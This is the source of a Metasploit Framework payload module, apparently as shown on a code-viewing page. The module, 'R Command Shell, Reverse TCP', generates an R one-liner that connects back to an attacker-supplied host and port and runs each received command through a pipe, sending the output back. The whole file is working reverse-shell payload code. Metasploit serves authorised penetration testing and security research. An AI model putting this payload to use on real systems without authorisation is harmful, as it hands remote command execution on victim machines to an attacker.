Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 150
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::R
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'        => 'R Command Shell, Reverse TCP',
18
      'Description' => 'Connect back and create a command shell via R',
19
      'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
20
      'License'     => MSF_LICENSE,
21
      'Platform'    => 'r',
22
      'Arch'        => ARCH_R,
23
      'Handler'     => Msf::Handler::ReverseTcp,
24
      'Session'     => Msf::Sessions::CommandShell,
25
      'PayloadType' => 'r',
26
      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
27
    ))
28
  end
29

30
  def generate(_opts = {})
31
    return prepends(r_string)
32
  end
33

34
  def r_string
35
    lhost = datastore['LHOST']
36
    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
37
    return "s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']}," +
38
    "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
39
    "(pipe(readLines(s, 1))),s)}"
40
  end
41
end
42

43